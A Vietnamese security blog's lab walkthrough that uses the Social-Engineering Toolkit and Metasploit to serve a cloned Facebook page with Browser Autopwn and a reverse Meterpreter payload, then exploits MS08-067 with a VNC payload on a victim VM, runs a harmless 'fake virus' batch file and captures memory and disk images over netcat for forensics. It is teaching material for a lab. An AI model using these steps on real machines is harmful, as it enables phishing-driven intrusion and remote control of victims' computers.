Hướng Dẫn Thực Hành - Social Engineering Toolkit (SET) : Lesson 3

{ Create Malicious Weblink, Install Virus, Capture Forensic Images }

Section 0. Background Information

What is the Social-Engineering Toolkit (SET)
- The Social-Engineering Toolkit (SET) is a python-driven suite of custom tools which solely focuses on attacking the human element of penetration testing.
- It's main purpose is to augment and simulate social-engineering attacks and allow the tester to effectively test how a targeted attack may succeed.
- Social-Engineering toolkit available on backtrack like on backtrack 5, backbox, blackbuntu, Gnacktrack and other Linux distribution that are used for penetration testing.
Lab Notes
- In this lab we will do the following:
  1. Use Set to Create a Malicious Web Link
  2. Create an addition VNC Session
  3. Install a Fake Virus
  4. Capture a Forensics Memory and Hard Disk Image.

Legal Disclaimer : Các bài lab chỉ dùng cho môi trường học tập, không thử nghiệm trên các hệ thống không có thẩm quyền.

Section 1. Configure BackTrack Virtual Machine Settings

Open Your VMware Player
- Instructions:
  1. On Your Host Computer, Go To
  2. Start --> All Program --> VMWare --> VMWare Player
Edit BackTrack Virtual Machine Settings
- Instructions:
  1. Highlight BackTrack5R1
  2. Click Edit virtual machine settings
Edit Network Adapter

Instructions:
1. Highlight Network Adapter
2. Select Bridged
3. Do not Click on the OK Button.

Section 2. Login to BackTrack

Start BackTrack VM Instance
- Instructions:
  1. Start Up VMWare Player
  2. Select BackTrack5R1
  3. Play virtual machine
Login to BackTrack
- Instructions:
  1. Login: root
  2. Password: toor or <whatever you changed it to>.
Bring up the GNOME
- Instructions:
  1. Type startx

Section 3. Open Console Terminal and Retrieve IP Address

Open a console terminal
- Instructions:
  1. Click on the console terminal
Get IP Address
- Instructions:
  1. ifconfig -a
- Notes:
  - As indicated below, my IP address is 192.168.1.105.
  - Please record your IP address.

Section 4. Start the Social Engineering ToolKit

Start Social Engineering ToolKit
- Instructions:
  1. cd /pentest/exploits/set
  2. ./set
Website Attack Vector
- Instructions:
  1. Select 2
Select Metasploit Browser Attack Method
- Instructions:
  1. Select 2
Select Web Templates
- Instructions:
  1. Select 1
Set Facebook Web Attack
- Instructions:
  1. Select 4
Enter Exploit
- Instructions:
  1. 24) Metasploit Browser Autopwn (USE AT OWN RISK!)
Set Payload
- Instructions:
  1. Select 2) Windows Reverse_TCP Meterpreter
  2. Use Port 5555
Exploits Prepared, Server Started
- Instructions:
  1. Your are looking for the "--- Done, Found" before you Continue.
  2. Continue to next Section.

Section 5. Start Up Windows Machine

Social Engineering Note
- Image how an attacker could embed the malicious link, created in previous Section, in an email to a possible victim.
- This type of attack is especially dangerous because it crashes the victim's web browser, and the victim does not realize the Metasploit payload was injected and a session is now attached to a migrated notepad process.

Booting up WindowsVulerable01
- Instructions:
  1. Start up VMware Player
  2. Select WindowsVulerable01
  3. Edit Virtual Machine
Configuring the Network Adapter
- Instructions:
  1. Select Network Adapter
  2. Select Bridged Connection
  3. Select OK
Play WindowVulnerable01
- Instructions:
  1. Select Play virtual Machine
WindowsVulerable01 Authentication
- Instructions:
  1. Login as administrator

Section 6. Start Up a Web Browser

Start Up Internet Explorer
- Instructions:
  1. Start --> All Programs --> Internet Explorer
Victim Clicks on Link
- Instructions:
  1. Place the Malicious Web Link in the Address Bar.
    - In my case, http://192.168.1.105:8080
    - In your case, get the IP address from Section 4, Step 8.
- Note:
  - The Web Browser will just crash.

Section 7. Entering the Victim's Machine

Record Victim's IP Address
- Instructions:
  1. Record the Victim's IP Address.
  2. Look for the line that starts with Session ID 1 (See Below).
Create VNC Session to Victim's machine
- Instructions:
  1. use windows/smb/ms08_067_netapi
  2. set PAYLOAD windows/vncinject/bind_tcp
  3. set RHOST 192.168.1.109
    - Note: This is the IP Address obtained in the previous step.
  4. exploit
Viewing the Victim's Machine over VNC
- Instructions:
  1. Now you have a VNC connection to the Victim's Machine.
  2. Pretty KooL right!!!
- Proof of Lab Instructions #1:
  1. Click in the Metasploit Courtesy Shell
  2. date, press enter twice
  3. echo "Your Name"
    - Replace the string "Your Name" with your actual name.
    - i.e., echo "John Gray"
  4. PrtScn
  5. Paste into a word document
  6. Continue to Next Step
Bring Up Internet Explorer
- Instructions:
  1. Start --> Internet Explorer
Download Fake Virus.
- Instructions:
  1. Place "http://www.antoanthongtin.edu.vn/UNIX/BACKTRACK/lesson6/fake_virus.bat" into the address bar.
  2. Press Enter
  3. Click Save
  4. Continue to Next Step
Save the Fake Virus.
- Instructions:
  1. Navigate to "C:\tools\Virus Jar"
    - Create this directory if it does not already exist.
  2. Click Save
Run the Fake Virus.
- Instructions:
  1. Click the Run Button
Viewing Results
- Instructions:
  1. You will now see some messages stating your system was compromised.
    - Note, this is just a batch script that prints messages to a screen.
    - This was just an example of what an attacker could do once they compromised the victim's machine.
  2. Click on the Black Box and Press Enter.
Delete the fake_virus.bat file
- Instructions:
  1. Start --> My Computer
  2. Navigate to "C:\tools\Virus Jar"
  3. Right Click on fake_virus.bat
  4. Click Delete
  5. Send to Recycle Bin? Yes
Delete the fake_virus.bat file for the Recycle Bin
- Instructions:
  1. Navigate to the Recycle Bin
  2. Right Click on fake_virus.bat
  3. Click Delete
  4. Are you sure want to delete 'fake_virus.bat'? Yes
- Notes:
  - We are completly removing this file, so we have a deleted file to both analyze and recover with preceding forensic labs.

Section 8. Start Up NetCat Listener To Receive Physical Memory Dump From Helix

Open a console terminal
- Instructions:
  1. Click on the console terminal
Get IP Address
- Instructions:
  1. ifconfig -a
- Notes:
  - As indicated below, my IP address is 192.168.1.105.
  - Please record your IP address.
Start Up Netcat on BackTrack
- Instructions:
  1. mkdir -p /FORENSICS/images/1/
  2. cd /FORENSICS/images/1/
  3. nc -l -vvv -p 8888 > WV01_PM_fake_virus.dd
    - Netcat will listen for Helix to send the Memory Image.
    - Nothing will be sent until you complete the following section.
  4. Continue to Next Section

Section 9. Start Helix to Send Physical Memory to BackTrack

Edit Virtual Machine Settings
- Instructions:
  1. Virtual Machine --> Virtual Machine Settings...
Configure Windows to load the Helix iso as a CD/DVD
- Instructions:
  1. Select CD/DVD (IDE)
  2. Select the Use ISO image file
  3. Browse to where you saved the Helix iso.
    - Note: In my case, I save it in the following location:
    - H:\BOOT ISO\Helix2008R1.iso
Helix Screen
- Instructions:
  1. Select Accept
Live Acquisition
- Instructions:
  1. Click on the Camera Icon.
  2. Select "\\PhysicalMemory" from the Source Dropdown Menu
  3. Select the NetCat Radio Button
  4. Destination IP: Provide BackTrack's IP Address.
    - Obtain BackTrack's IP in Section 8, Step 2.
    - In my case, it is 192.168.1.105.
    - In your case, it will be different.
  5. Port: 8888
    - This is the Listening NetCat Port on the BackTrack Server.
  6. Click Acquire
Notice
- Instructions:
  1. Click Yes
Helix Informational
- Instructions:
  1. You will see a black command prompt like below.
  2. Notice it will say "Copying Physical memory"
  3. DO NOT CONTINUE TO THE NEXT SECTION UNTIL the black box disappears

Section 10. Verify Physical Memory Dump on BackTrack

Verify Image Byte Size
- Instructions:
  1. ls -l WV01_PM_fake_virus.dd

Section 11. Start Up NetCat Listener To Receive Hard Drive Image From Helix

Start Up Netcat on BackTrack
- Instructions:
  1. cd /FORENSICS/images/1/
  2. nc -l -vvv -p 8888 > WV01_HD_fake_virus.dd
    - Netcat will listen for Helix to send the Hard Drive Image.
    - Nothing will be sent until you complete the following section.
  3. Continue to Next Section

Section 12. Use Helix to Send Hard Disk Image to BackTrack

Live Acquisition
- Instructions:
  1. Click on the Camera Icon.
  2. Select "C:\ (Logical drive)" from the Source Dropdown Menu
  3. Select the NetCat Radio Button
  4. Destination IP: Provide BackTrack's IP Address.
    - Obtain BackTrack's IP in Section 8, Step 2.
    - In my case, it is 192.168.1.105.
    - In your case, it will be different.
  5. Port: 8888
    - This is the Listening NetCat Port on the BackTrack Server.
  6. Click Acquire
Notice
- Instructions:
  1. Click Yes
Helix Informational
- Instructions:
  1. You will see a black command prompt like below.
  2. Notice it will saying "Copying \\.\C to CONOUT$..."
  3. This 8GB copy will take about 30 minutes.
  4. DO NOT CONTINUE TO THE NEXT SECTION UNTIL the black box disappears

Section 13. Verify Hard Drive Image on BackTrack

Verify Image Byte Size
- Instructions:
  1. ls -l WV01*
  2. date
  3. echo "Your Name"
    - Replace the string "Your Name" with your actual name.
    - i.e., echo "John Gray"
- Proof of Lab Instructions #2:
  1. PrtScn
  2. Paste into the previously created word document

an toan thong tin

Giới thiệu về tôi

Lưu trữ Blog

Hướng Dẫn Thực Hành - Social Engineering Toolkit (SET) : Lesson 3

Written By Unknown on Thứ Hai, 18 tháng 11, 2013 | 02:54

0 nhận xét:

Đăng nhận xét

BackTrack

Metasploit

Web

DVWA